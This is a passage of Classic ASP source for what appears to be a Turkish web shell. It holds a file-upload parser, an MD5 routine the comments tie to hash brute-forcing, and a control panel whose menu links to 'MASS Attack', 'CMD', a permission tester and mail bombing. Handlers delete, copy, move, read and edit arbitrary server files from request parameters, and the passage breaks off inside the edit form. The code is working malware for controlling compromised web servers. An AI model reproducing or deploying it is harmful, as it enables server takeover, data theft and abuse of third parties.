            llngLength = llngEnd - llngStart
            lbinChunk = MidB(mbinData, llngStart, llngLength)
            Call ParseChunk(lbinChunk)
            llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
        Wend
    End Sub

    Private Sub ParseChunk(ByRef pbinChunk)
        Dim lstrName
        Dim lstrFileName
        Dim lstrContentType
        Dim lbinData
        Dim lstrDisposition
        Dim lstrValue
        lstrDisposition = ParseDisposition(pbinChunk)
        lstrName = ParseName(lstrDisposition)
        lstrFileName = ParseFileName(lstrDisposition)
        lstrContentType = ParseContentType(pbinChunk)
        If lstrContentType = "" Then
            lstrValue = CStrU(ParseBinaryData(pbinChunk))
        Else
            lbinData = ParseBinaryData(pbinChunk)
        End If
        Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
    End Sub

    Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
        Dim lobjField
        ReDim Preserve mobjFieldAry(mlngCount)
        Set lobjField = New clsField
        lobjField.Name = pstrName
        lobjField.FilePath = pstrFileName
        lobjField.ContentType = pstrContentType
        If LenB(pbinData) = 0 Then
            lobjField.BinaryData = ChrB(0)
            lobjField.Value = pstrValue
            lobjField.Length = Len(pstrValue)
        Else
            lobjField.BinaryData = pbinData
            lobjField.Length = LenB(pbinData)
            lobjField.Value = ""
        End If
        Set mobjFieldAry(mlngCount) = lobjField
        mlngCount = mlngCount + 1
    End Sub

    Private Function ParseBinaryData(ByRef pbinChunk)
        Dim llngStart
        llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
        If llngStart = 0 Then Exit Function
        llngStart = llngStart + 4
        ParseBinaryData = MidB(pbinChunk, llngStart)
    End Function

    Private Function ParseContentType(ByRef pbinChunk)
        Dim llngStart
        Dim llngEnd
        Dim llngLength
        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
        If llngStart = 0 Then Exit Function
        llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
        If llngEnd = 0 Then Exit Function
        llngStart = llngStart + 15
        If llngStart >= llngEnd Then Exit Function
        llngLength = llngEnd - llngStart
        ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
    End Function

    Private Function ParseDisposition(ByRef pbinChunk)
        Dim llngStart
        Dim llngEnd
        Dim llngLength
        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
        If llngStart = 0 Then Exit Function
        llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
        If llngEnd = 0 Then Exit Function
        llngStart = llngStart + 22
        If llngStart >= llngEnd Then Exit Function
        llngLength = llngEnd - llngStart
        ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
    End Function

    Private Function ParseName(ByRef pstrDisposition)
        Dim llngStart
        Dim llngEnd
        Dim llngLength
        llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
        If llngStart = 0 Then Exit Function
        llngEnd = InStr(llngStart + 6, pstrDisposition, """")
        If llngEnd = 0 Then Exit Function
        llngStart = llngStart + 6
        If llngStart >= llngEnd Then Exit Function
        llngLength = llngEnd - llngStart
        ParseName = Mid(pstrDisposition, llngStart, llngLength)
    End Function

    Private Function ParseFileName(ByRef pstrDisposition)
        Dim llngStart
        Dim llngEnd
        Dim llngLength
        llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
        If llngStart = 0 Then Exit Function
        llngEnd = InStr(llngStart + 10, pstrDisposition, """")
        If llngEnd = 0 Then Exit Function
        llngStart = llngStart + 10
        If llngStart >= llngEnd Then Exit Function
        llngLength = llngEnd - llngStart
        ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
    End Function

    Public Property Get Count()
        Count = mlngCount
    End Property

    Public Default Property Get Fields(ByVal pstrName)
        Dim llngIndex
        If IsNumeric(pstrName) Then
            llngIndex = CLng(pstrName)
            If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
                Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
                Exit Property
            End If
            Set Fields = mobjFieldAry(pstrName)
        Else
            pstrName = LCase(pstrname)
            For llngIndex = 0 To mlngCount - 1
                If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
                    Set Fields = mobjFieldAry(llngIndex)
                    Exit Property
                End If
            Next
        End If
        Set Fields = New clsField
    End Property

    Private Sub Class_Terminate()
        Dim llngIndex
        For llngIndex = 0 To mlngCount - 1
            Set mobjFieldAry(llngIndex) = Nothing

        Next
        ReDim mobjFieldAry(-1)
    End Sub

    Private Sub Class_Initialize()
        ReDim mobjFieldAry(-1)
        CR = ChrB(Asc(vbCr))
        LF = ChrB(Asc(vbLf))
        CRLF = CR & LF
        mlngCount = 0
        Call RequestData
        Call ParseDelimiter()
        Call ParseData
    End Sub

    Private Function CStrU(ByRef pstrANSI)
        Dim llngLength
        Dim llngIndex
        llngLength = LenB(pstrANSI)
        For llngIndex = 1 To llngLength
            CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
        Next
    End Function

    Private Function CStrB(ByRef pstrUnicode)
        Dim llngLength
        Dim llngIndex
        llngLength = Len(pstrUnicode)
        For llngIndex = 1 To llngLength
            CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
        Next
    End Function
End Class

Class clsField
    Public Name
    Private mstrPath
    Public FileDir
    Public FileExt
    Public FileName
    Public ContentType
    Public Value
    Public BinaryData
    Public Length
    Private mstrText

    Public Property Get BLOB()
        BLOB = BinaryData
    End Property

    Public Function BinaryAsText()
        Dim lbinBytes
        Dim lobjRs
        If Length = 0 Then Exit Function
        If LenB(BinaryData) = 0 Then Exit Function

        If Not Len(mstrText) = 0 Then
            BinaryAsText = mstrText
            Exit Function
        End If
        lbinBytes = ASCII2Bytes(BinaryData)
           mstrText = Bytes2Unicode(lbinBytes)
        BinaryAsText = mstrText
    End Function

    Public Sub SaveAs(ByRef pstrFileName)
        Const adTypeBinary=1
        Const adSaveCreateOverWrite=2
        Dim lobjStream
        Dim lobjRs
        Dim lbinBytes
        If Length = 0 Then Exit Sub
        If LenB(BinaryData) = 0 Then Exit Sub
        Set lobjStream = Server.CreateObject("ADODB.Stream")
        lobjStream.Type = adTypeBinary
        Call lobjStream.Open()
        lbinBytes = ASCII2Bytes(BinaryData)
        Call lobjStream.Write(lbinBytes)

        On Error Resume Next

        Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)

        'if err<>0 then response.Write "<br>"&err.Description

        Call lobjStream.Close()
        Set lobjStream = Nothing
    End Sub

    Public Property Let FilePath(ByRef pstrPath)
        mstrPath = pstrPath
        If Not InStrRev(pstrPath, ".") = 0 Then
            FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
            FileExt = UCase(FileExt)
        End If
        If Not InStrRev(pstrPath, "\") = 0 Then
            FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
        End If
        If Not InStrRev(pstrPath, "\") = 0 Then
            FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
        End If
    End Property

    Public Property Get FilePath()
        FilePath = mstrPath
    End Property

    private Function ASCII2Bytes(ByRef pbinBinaryData)
        Const adLongVarBinary=205
        Dim lobjRs
        Dim llngLength
        Dim lbinBuffer
        llngLength = LenB(pbinBinaryData)
        Set lobjRs = Server.CreateObject("ADODB.Recordset")
        Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
        Call lobjRs.Open()
        Call lobjRs.AddNew()
        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
        Call lobjRs.Update()
        lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
        Call lobjRs.Close()
        Set lobjRs = Nothing
        ASCII2Bytes = lbinBuffer
    End Function

    Private Function Bytes2Unicode(ByRef pbinBytes)
        Dim lobjRs
        Dim llngLength
        Dim lstrBuffer
        llngLength = LenB(pbinBytes)
        Set lobjRs = Server.CreateObject("ADODB.Recordset")
        Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
        Call lobjRs.Open()
        Call lobjRs.AddNew()
        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
        Call lobjRs.Update()
        lstrBuffer = lobjRs.Fields("BinaryData").Value
        Call lobjRs.Close()
        Set lobjRs = Nothing
        Bytes2Unicode = lstrBuffer
    End Function
End Class

function addslash(path)
    if right(path,1)="\" then addslash=path else addslash=path & "\"
end function

sub Upload()
    dim objUpload,f,max,i,name,path,size,success

    set objUpload=New clsUpload

    targetPath=objUpload.Fields("folder").Value
    max=objUpload.Fields("max").Value
success=true
    for i=1 to max
        name=objUpload.Fields("file" & i).FileName
        size=objUpload.Fields("file" & i).Length
        if (name<>"") and (size>0) then
            gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
            path=addslash(targetPath) & name
            objUpload.Fields("file" & i).SaveAs path

            if FSO.FileExists(path) then
                on error resume next
                set f=objFSO.GetFile(path)
                if IsObject(f) then
                    if f.Size=size then success=true else success=false
                end if
                set f=nothing
            end if
            if success then  gMsg=gMsg & "<font color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!</font>"
        end if
    next
    response.Write gMsg
    set objUpload=nothing

end sub


'***************************************************************************************************************************************
'************* MD5 HASH İşlemi Converted by FASTBOY - Used & Written Brute Algortithms by ejder ;)  ************************************
'************* Md5 kodlar FASTBOY tarafından hem MD5 için hemde Serv-u için toparlanmış ve düzeltilmiştir.   ***************************
'************* KOdları Brute olarak belli mantıkla vede Server ın kaynaklarını kullanrak bulma, çözme olayınıda ejder yazmıştır ********
'***************************************************************************************************************************************
'*********************************************************
'*************   COnverted by FASTBOY ;)  ****************
'*******  The Brute Algortihms Owned to ejder  ;)   ******
'*********************************************************
'*********************************************************
' MD5 kodlama başladıı..
Private Const BITS_TO_A_BYTE = 8
Private Const BYTES_TO_A_WORD = 4
Private Const BITS_TO_A_WORD = 32

Private m_lOnBits(30)
Private m_l2Power(30)
 
    m_lOnBits(0) = CLng(1)
    m_lOnBits(1) = CLng(3)
    m_lOnBits(2) = CLng(7)
    m_lOnBits(3) = CLng(15)
    m_lOnBits(4) = CLng(31)
    m_lOnBits(5) = CLng(63)
    m_lOnBits(6) = CLng(127)
    m_lOnBits(7) = CLng(255)
    m_lOnBits(8) = CLng(511)
    m_lOnBits(9) = CLng(1023)
    m_lOnBits(10) = CLng(2047)
    m_lOnBits(11) = CLng(4095)
    m_lOnBits(12) = CLng(8191)
    m_lOnBits(13) = CLng(16383)
    m_lOnBits(14) = CLng(32767)
    m_lOnBits(15) = CLng(65535)
    m_lOnBits(16) = CLng(131071)
    m_lOnBits(17) = CLng(262143)
    m_lOnBits(18) = CLng(524287)
    m_lOnBits(19) = CLng(1048575)
    m_lOnBits(20) = CLng(2097151)
    m_lOnBits(21) = CLng(4194303)
    m_lOnBits(22) = CLng(8388607)
    m_lOnBits(23) = CLng(16777215)
    m_lOnBits(24) = CLng(33554431)
    m_lOnBits(25) = CLng(67108863)
    m_lOnBits(26) = CLng(134217727)
    m_lOnBits(27) = CLng(268435455)
    m_lOnBits(28) = CLng(536870911)
    m_lOnBits(29) = CLng(1073741823)
    m_lOnBits(30) = CLng(2147483647)
    
    m_l2Power(0) = CLng(1)
    m_l2Power(1) = CLng(2)
    m_l2Power(2) = CLng(4)
    m_l2Power(3) = CLng(8)
    m_l2Power(4) = CLng(16)
    m_l2Power(5) = CLng(32)
    m_l2Power(6) = CLng(64)
    m_l2Power(7) = CLng(128)
    m_l2Power(8) = CLng(256)
    m_l2Power(9) = CLng(512)
    m_l2Power(10) = CLng(1024)
    m_l2Power(11) = CLng(2048)
    m_l2Power(12) = CLng(4096)
    m_l2Power(13) = CLng(8192)
    m_l2Power(14) = CLng(16384)
    m_l2Power(15) = CLng(32768)
    m_l2Power(16) = CLng(65536)
    m_l2Power(17) = CLng(131072)
    m_l2Power(18) = CLng(262144)
    m_l2Power(19) = CLng(524288)
    m_l2Power(20) = CLng(1048576)
    m_l2Power(21) = CLng(2097152)
    m_l2Power(22) = CLng(4194304)
    m_l2Power(23) = CLng(8388608)
    m_l2Power(24) = CLng(16777216)
    m_l2Power(25) = CLng(33554432)
    m_l2Power(26) = CLng(67108864)
    m_l2Power(27) = CLng(134217728)
    m_l2Power(28) = CLng(268435456)
    m_l2Power(29) = CLng(536870912)
    m_l2Power(30) = CLng(1073741824)

Private Function LShift(lValue, iShiftBits)
    If iShiftBits = 0 Then
        LShift = lValue
        Exit Function
    ElseIf iShiftBits = 31 Then
        If lValue And 1 Then
            LShift = &H80000000
        Else
            LShift = 0
        End If
        Exit Function
    ElseIf iShiftBits < 0 Or iShiftBits > 31 Then
        Err.Raise 6
    End If

    If (lValue And m_l2Power(31 - iShiftBits)) Then
        LShift = ((lValue And m_lOnBits(31 - (iShiftBits + 1))) * m_l2Power(iShiftBits)) Or &H80000000
    Else
        LShift = ((lValue And m_lOnBits(31 - iShiftBits)) * m_l2Power(iShiftBits))
    End If
End Function
Private Function RShift(lValue, iShiftBits)
    If iShiftBits = 0 Then
        RShift = lValue
        Exit Function
    ElseIf iShiftBits = 31 Then
        If lValue And &H80000000 Then
            RShift = 1
        Else
            RShift = 0
        End If
        Exit Function
    ElseIf iShiftBits < 0 Or iShiftBits > 31 Then
        Err.Raise 6
    End If
    
    RShift = (lValue And &H7FFFFFFE) \ m_l2Power(iShiftBits)

    If (lValue And &H80000000) Then
        RShift = (RShift Or (&H40000000 \ m_l2Power(iShiftBits - 1)))
    End If
End Function

Private Function RotateLeft(lValue, iShiftBits)
    RotateLeft = LShift(lValue, iShiftBits) Or RShift(lValue, (32 - iShiftBits))
End Function

Private Function AddUnsigned(lX, lY)
    Dim lX4
    Dim lY4
    Dim lX8
    Dim lY8
    Dim lResult
 
    lX8 = lX And &H80000000
    lY8 = lY And &H80000000
    lX4 = lX And &H40000000
    lY4 = lY And &H40000000
 
    lResult = (lX And &H3FFFFFFF) + (lY And &H3FFFFFFF)
 
    If lX4 And lY4 Then
        lResult = lResult Xor &H80000000 Xor lX8 Xor lY8
    ElseIf lX4 Or lY4 Then
        If lResult And &H40000000 Then
            lResult = lResult Xor &HC0000000 Xor lX8 Xor lY8
        Else
            lResult = lResult Xor &H40000000 Xor lX8 Xor lY8
        End If
    Else
        lResult = lResult Xor lX8 Xor lY8
    End If
 
    AddUnsigned = lResult
End Function

Private Function Fq(x, y, z)
    Fq = (x And y) Or ((Not x) And z)
End Function

Private Function Gq(x, y, z)
    Gq = (x And z) Or (y And (Not z))
End Function

Private Function Hq(x, y, z)
    Hq = (x Xor y Xor z)
End Function

Private Function Iq(x, y, z)
    Iq = (y Xor (x Or (Not z)))
End Function

Private Sub FF(a, b, c, d, x, s, ac)
    a = AddUnsigned(a, AddUnsigned(AddUnsigned(Fq(b, c, d), x), ac))
    a = RotateLeft(a, s)
    a = AddUnsigned(a, b)
End Sub

Private Sub GG(a, b, c, d, x, s, ac)
    a = AddUnsigned(a, AddUnsigned(AddUnsigned(Gq(b, c, d), x), ac))
    a = RotateLeft(a, s)
    a = AddUnsigned(a, b)
End Sub

Private Sub HH(a, b, c, d, x, s, ac)
    a = AddUnsigned(a, AddUnsigned(AddUnsigned(Hq(b, c, d), x), ac))
    a = RotateLeft(a, s)
    a = AddUnsigned(a, b)
End Sub

Private Sub II(a, b, c, d, x, s, ac)
    a = AddUnsigned(a, AddUnsigned(AddUnsigned(Iq(b, c, d), x), ac))
    a = RotateLeft(a, s)
    a = AddUnsigned(a, b)
End Sub

'*********************************************************
'*************   COnverted by FASTBOY ;)  ****************
'*******  The Brute Algortihms Owned to ejder  ;)   ******
'*********************************************************
'*********************************************************

Private Function ConvertToWordArray(sMessage)
    Dim lMessageLength
    Dim lNumberOfWords
    Dim lWordArray()
    Dim lBytePosition
    Dim lByteCount
    Dim lWordCount
    
    Const MODULUS_BITS = 512
    Const CONGRUENT_BITS = 448
    
    lMessageLength = Len(sMessage)
    
    lNumberOfWords = (((lMessageLength + ((MODULUS_BITS - CONGRUENT_BITS) \ BITS_TO_A_BYTE)) \ (MODULUS_BITS \ BITS_TO_A_BYTE)) + 1) * (MODULUS_BITS \ BITS_TO_A_WORD)
    ReDim lWordArray(lNumberOfWords - 1)
    
    lBytePosition = 0
    lByteCount = 0
    Do Until lByteCount >= lMessageLength
        lWordCount = lByteCount \ BYTES_TO_A_WORD
        lBytePosition = (lByteCount Mod BYTES_TO_A_WORD) * BITS_TO_A_BYTE
        lWordArray(lWordCount) = lWordArray(lWordCount) Or LShift(Asc(Mid(sMessage, lByteCount + 1, 1)), lBytePosition)
        lByteCount = lByteCount + 1
    Loop

    lWordCount = lByteCount \ BYTES_TO_A_WORD
    lBytePosition = (lByteCount Mod BYTES_TO_A_WORD) * BITS_TO_A_BYTE

    lWordArray(lWordCount) = lWordArray(lWordCount) Or LShift(&H80, lBytePosition)

    lWordArray(lNumberOfWords - 2) = LShift(lMessageLength, 3)
    lWordArray(lNumberOfWords - 1) = RShift(lMessageLength, 29)
    
    ConvertToWordArray = lWordArray
End Function

Private Function WordToHex(lValue)
    Dim lByte
    Dim lCount
    
    For lCount = 0 To 3
        lByte = RShift(lValue, lCount * BITS_TO_A_BYTE) And m_lOnBits(BITS_TO_A_BYTE - 1)
        WordToHex = WordToHex & Right("0" & Hex(lByte), 2)
    Next
End Function


Public Function MD5(sMessage)
    Dim x
    Dim k
    Dim AA
    Dim BB
    Dim CC
    Dim DD
    Dim a
    Dim b
    Dim c
    Dim d
    
    Const S11 = 7
    Const S12 = 12
    Const S13 = 17
    Const S14 = 22
    Const S21 = 5
    Const S22 = 9
    Const S23 = 14
    Const S24 = 20
    Const S31 = 4
    Const S32 = 11
    Const S33 = 16
    Const S34 = 23
    Const S41 = 6
    Const S42 = 10
    Const S43 = 15
    Const S44 = 21

    x = ConvertToWordArray(sMessage)
    
    a = &H67452301
    b = &HEFCDAB89
    c = &H98BADCFE
    d = &H10325476

    For k = 0 To UBound(x) Step 16
        AA = a
        BB = b
        CC = c
        DD = d
    
        FF a, b, c, d, x(k + 0), S11, &HD76AA478
        FF d, a, b, c, x(k + 1), S12, &HE8C7B756
        FF c, d, a, b, x(k + 2), S13, &H242070DB
        FF b, c, d, a, x(k + 3), S14, &HC1BDCEEE
        FF a, b, c, d, x(k + 4), S11, &HF57C0FAF
        FF d, a, b, c, x(k + 5), S12, &H4787C62A
        FF c, d, a, b, x(k + 6), S13, &HA8304613
        FF b, c, d, a, x(k + 7), S14, &HFD469501
        FF a, b, c, d, x(k + 8), S11, &H698098D8
        FF d, a, b, c, x(k + 9), S12, &H8B44F7AF
        FF c, d, a, b, x(k + 10), S13, &HFFFF5BB1
        FF b, c, d, a, x(k + 11), S14, &H895CD7BE
        FF a, b, c, d, x(k + 12), S11, &H6B901122
        FF d, a, b, c, x(k + 13), S12, &HFD987193
        FF c, d, a, b, x(k + 14), S13, &HA679438E
        FF b, c, d, a, x(k + 15), S14, &H49B40821
    
        GG a, b, c, d, x(k + 1), S21, &HF61E2562
        GG d, a, b, c, x(k + 6), S22, &HC040B340
        GG c, d, a, b, x(k + 11), S23, &H265E5A51
        GG b, c, d, a, x(k + 0), S24, &HE9B6C7AA
        GG a, b, c, d, x(k + 5), S21, &HD62F105D
        GG d, a, b, c, x(k + 10), S22, &H2441453
        GG c, d, a, b, x(k + 15), S23, &HD8A1E681
        GG b, c, d, a, x(k + 4), S24, &HE7D3FBC8
        GG a, b, c, d, x(k + 9), S21, &H21E1CDE6
        GG d, a, b, c, x(k + 14), S22, &HC33707D6
        GG c, d, a, b, x(k + 3), S23, &HF4D50D87
        GG b, c, d, a, x(k + 8), S24, &H455A14ED
        GG a, b, c, d, x(k + 13), S21, &HA9E3E905
        GG d, a, b, c, x(k + 2), S22, &HFCEFA3F8
        GG c, d, a, b, x(k + 7), S23, &H676F02D9
        GG b, c, d, a, x(k + 12), S24, &H8D2A4C8A
            
        HH a, b, c, d, x(k + 5), S31, &HFFFA3942
        HH d, a, b, c, x(k + 8), S32, &H8771F681
        HH c, d, a, b, x(k + 11), S33, &H6D9D6122
        HH b, c, d, a, x(k + 14), S34, &HFDE5380C
        HH a, b, c, d, x(k + 1), S31, &HA4BEEA44
        HH d, a, b, c, x(k + 4), S32, &H4BDECFA9
        HH c, d, a, b, x(k + 7), S33, &HF6BB4B60
        HH b, c, d, a, x(k + 10), S34, &HBEBFBC70
        HH a, b, c, d, x(k + 13), S31, &H289B7EC6
        HH d, a, b, c, x(k + 0), S32, &HEAA127FA
        HH c, d, a, b, x(k + 3), S33, &HD4EF3085
        HH b, c, d, a, x(k + 6), S34, &H4881D05
        HH a, b, c, d, x(k + 9), S31, &HD9D4D039
        HH d, a, b, c, x(k + 12), S32, &HE6DB99E5
        HH c, d, a, b, x(k + 15), S33, &H1FA27CF8
        HH b, c, d, a, x(k + 2), S34, &HC4AC5665
    
        II a, b, c, d, x(k + 0), S41, &HF4292244
        II d, a, b, c, x(k + 7), S42, &H432AFF97
        II c, d, a, b, x(k + 14), S43, &HAB9423A7
        II b, c, d, a, x(k + 5), S44, &HFC93A039
        II a, b, c, d, x(k + 12), S41, &H655B59C3
        II d, a, b, c, x(k + 3), S42, &H8F0CCC92
        II c, d, a, b, x(k + 10), S43, &HFFEFF47D
        II b, c, d, a, x(k + 1), S44, &H85845DD1
        II a, b, c, d, x(k + 8), S41, &H6FA87E4F
        II d, a, b, c, x(k + 15), S42, &HFE2CE6E0
        II c, d, a, b, x(k + 6), S43, &HA3014314
        II b, c, d, a, x(k + 13), S44, &H4E0811A1
        II a, b, c, d, x(k + 4), S41, &HF7537E82
        II d, a, b, c, x(k + 11), S42, &HBD3AF235
        II c, d, a, b, x(k + 2), S43, &H2AD7D2BB
        II b, c, d, a, x(k + 9), S44, &HEB86D391
    
        a = AddUnsigned(a, AA)
        b = AddUnsigned(b, BB)
        c = AddUnsigned(c, CC)
        d = AddUnsigned(d, DD)
    Next
    
    MD5 = LCase(WordToHex(a) & WordToHex(b) & WordToHex(c) & WordToHex(d))
End Function
'***************************************************************************************************************************
'***************************  MD5 KOdları Biter.   *************************************************************************
'***************************************************************************************************************************
if popup = False then
'Link ve Konum paneli by ejder
'Türk Bayrağı Ascii Karakterlerle - Created By FasTBoY :)
Response.Write "<center><table width=80 height=50 cellpadding=0 cellspacing=0><tr><td width=10 align=left valign=middle style=""background-color:AA0000"">&nbsp;</td><td width=70 align=left valign=middle style=""background-color:AA0000""><font size=7 face=Wingdings>Z</font></td></tr></table></center>"
response.write "<center><table width=""100%"" align=""center"">"
response.write "<tr valign=""top""><td colspan=""2"" align=""center""><br>"
response.write "<table cellpadding=""0"" cellspacing=""0"" height=""25""><tr><td class=""kbrtm"">&nbsp;&nbsp;&nbsp;<a href='"&FilePath&"?mode=37&konum="&konum&"&Time="&time&"'><b>Sistem Analizi*</b></a> | <a href='"&FilePath&"?mode=18&konum="&konum&"&Time="&time&"' onclick=""mass(this.href);return false;""><b>MASS Attack</b></a> | <a href='"&FilePath&"?mode=21&konum="&FolderPath&"&Time="&time&"' onclick=""tester(this.href);return false;""><b> Permision Tester </b></a> | <a href='"&FilePath&"?mode=24&konum="&konum&"&Time="&time&"' onclick=""klasor(this.href);return false;""><b>Klasör İşlemleri</b></a> | <a href='"&FilePath&"?mode=28&konum="&konum&"&Time="&time&"' onclick=""cmd(this.href);return false;""><b> CMD </b></a> | <a href='"&FilePath&"?mode=33&konum="&konum&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;""><b> Mail Bombardımanı </b></a> | <a href='"&FilePath&"?mode=99&konum="&konum&"&Time="&time&"' onclick=""biz(this.href);return false;""><b> *Ben kimim*! </b></a>&nbsp;&nbsp;&nbsp;</td></tr></table><br>"
response.write "</td></tr><td><tr><form action = "" "&FilePath&"?mode=23&konum="&konum&"&Time="&time&" "" method=""post""><table cellpadding=""0"" cellspacing=""0""><tr><td style=""background-color:121212"" class=""kbrtm"">&nbsp;&nbsp;&nbsp;<b>Arama: &nbsp;&nbsp;&nbsp;</b></td><td><input name=""hacked"" value=""mdb"" type=""text"" style=""width:200px;""></td><td><input type=""Submit"" value=""&nbsp;&nbsp;Ara &raquo;&nbsp;&nbsp;"" style=""width:70; font-weight:bold;""></td></tr></table></td></form></tr><td><tr>"
response.write "<form action = "" "&FilePath&"?mode=1&Time="&time&" "" method=""post"">"
response.write "<table cellpadding=""0"" cellspacing=""0""><tr><td style=""background-color:121212"" class=""kbrtm"">&nbsp;&nbsp;&nbsp;<b>Konum : &nbsp;&nbsp;&nbsp;</b></td><td><input name=""remote"" value='"&konum&"' type=""text"" style=""width:350px;""></td><td><input type=""Submit"" value=""Git &raquo;"" style=""width:50; font-weight:bold;""></td></tr></table>"
response.write ""
response.write "</td></form></tr>"
response.write "</table></center>"

'Yetki paneli by ejder
response.write "<table width=""100%"">"
response.write "<tr valign=""top""><td colspan=""2"" align=""center"">"
response.write "<table cellpadding=""0"" cellspacing=""0"">"
response.write "<tr><td style=""background-color:121212"" class=""kbrtm"">&nbsp;&nbsp;&nbsp;<b>Yetki :</b>&nbsp;&nbsp;&nbsp;</td>"
call yetki
response.write "</tr></table>"
response.write "<br></td></tr></table><br>"
end ifSELECT CASE mode
CASE 2 ' Dizin kopyala TAŞI by ejder
on error resume next
response.write "<table width=""100%"">"
response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"
response.write "<form name=""dizincopypaste"" action='"&FilePath&"' type=""post"">"
response.write "<table class=""kbrtm"" cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"
tablo30(" <b>Dizin Kopyala / Taşı Merkezi</b>")
tablo30("&nbsp;")
response.write "<input type=""hidden"" value=""3"" name=""mode""><input type=""hidden"" value="&file&" name=""file2""><input type=""hidden"" value="&FolderPath&" name=""konum""><input type=""hidden"" value="&time&" name=""Time""> " 
tablo12("Kop. Yer : <input style='color=#C6FCBE'  size=""60"" type=""text"" name=""FolderPath2"" value="&FolderPath&">")
tablo12("<input type=radio name='islem' value='kopyala' checked>Kopyala  <input type=radio name='islem' value='tasi'>Tasi ")
tablo12("<br><input value="" Gönder "" type=""Submit"">")
response.write "</form></table></td></tr></table><br>"
Call Hata

CASE 3 ' dizin kop taşımam gerçekleşiyor  by ejder
on error resume next
if islem="kopyala" then
    FSO.CopyFolder konum,FolderPath2
    isl="kopyalandı.."
elseif islem="tasi" then
    FSO.MoveFolder konum,FolderPath2
    isl="taşındı.."
end if
response.Write "<br><br><center>Klasor "&isl&" <br>"
response.Write "<br><font color=yellow>Kaynak : </font>"&FolderPath&"<br><font color=yellow>Hedef : </font>"&FolderPath2
response.Write "<br><br>by ejder</center>"
Call Hata

CASE 4 ' Dizin Sİlmee by ejder
on error resume next
FSO.DeleteFolder del
if err<>0 then
Call olmadi("Dizin Silenemdi")
else
Call oldu("Dizin Silindi")
end if

CASE 5 ' Dosya silme olayı gerçeklişiypor  by ejder
on error resume next
FSO.DeleteFile del
if err<>0 then
Call olmadi("Dosya Silinemedi")
else
Call oldu("Dosya Silindi")
end if

'CASE 6 ' Dosya Dowlaod etme by ejder
' Download hatalı olduğu için, ÜSTTE taşıdımm

CASE 7 ' Dosya Kopayla Taşıma POST kısmı by ejder
on error resume next
response.write "<table width=""100%"">"
response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"
response.write "<form name=""dosyacopypaste"" action='"&FilePath&"' type=""post"">"
response.write "<table class=""kbrtm"" cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"
tablo30(" <b>Dosya Kopyala / Taşı Merkezi</b>")
tablo30("&nbsp;")
response.write "<input type=""hidden"" value=""8"" name=""mode""><input type=""hidden"" value="&time&" name=""Time""><input type=""hidden"" value="&file&" name=""file""> " 
tablo12("Kop. Yer : <input  size=""60"" type=""text"" name=""folder"" value="&file&">")
tablo12("<input type=radio name='islem' value='kopyala' checked>Kopyala  <input type=radio name='islem' value='tasi'>Tasi ")
tablo12("<br><input value="" Gönder "" type=""Submit"">")
response.write "</form></table></td></tr></table><br>"
Call Hata

CASE 8 ' Dosya kopyala, taşımaa olayı by ejder
on error resume next
if islem="kopyala" then
    FSO.CopyFile file,folder&""
    isl="kopyalandı.."
elseif islem="tasi" then
    FSO.MoveFile file,folder&""
    isl="taşındı.."
end if
if err <> 0 then
response.Write "<br><br><center>Başarısızlıkla sonuçlandı !!! <br>"
else
response.Write "<br><br><center>Klasor "&isl&" <br>"
end if
response.Write "<br><font color=yellow>Kaynak : </font>"&file&"<br><font color=yellow>Hedef : </font>"&folder&"\"
response.Write "<br><br>by ejder</center>"
Call Hata

CASE 9 ' Dosya İçini görüntüle by ejder
on error resume next
Response.Write "<center><b><font color=orange>"&path&"</font></b></center><br>"
Response.Write "<table class=""kbrtm"" width=100% ><tr><td>"
set f = FSO.OpenTextFile(file,1)
Response.Write "<font size=3><pre>"&Server.HTMLEncode(f.readAll)&"</pre></font>"
Response.Write "</td></tr></table>"
nolist = True
if err<>62 then Hata
if err.number=62 then 
Response.Write "<script language=javascript>alert('Bu Dosya Okunamıyor\nSistem dosyası olabilir')</script>"
nolist = False
end if

CASE 10 ' ASP txt php .. gibi dosyaları Editlemek için POSt kısmı by ejder 
on error resume next
set f = FSO.OpenTextFile(file,1)
response.Write "<center><form action='"&FilePath&"?Time="&time&"&konum="&FolderPath&"' method=""post""><table class=""kbrtm""><tr><td align=""center"">"
Response.Write "<input type=hidden name=""mode"" value='11'>"
Response.Write "<input type=hidden name=file value="&file&">"
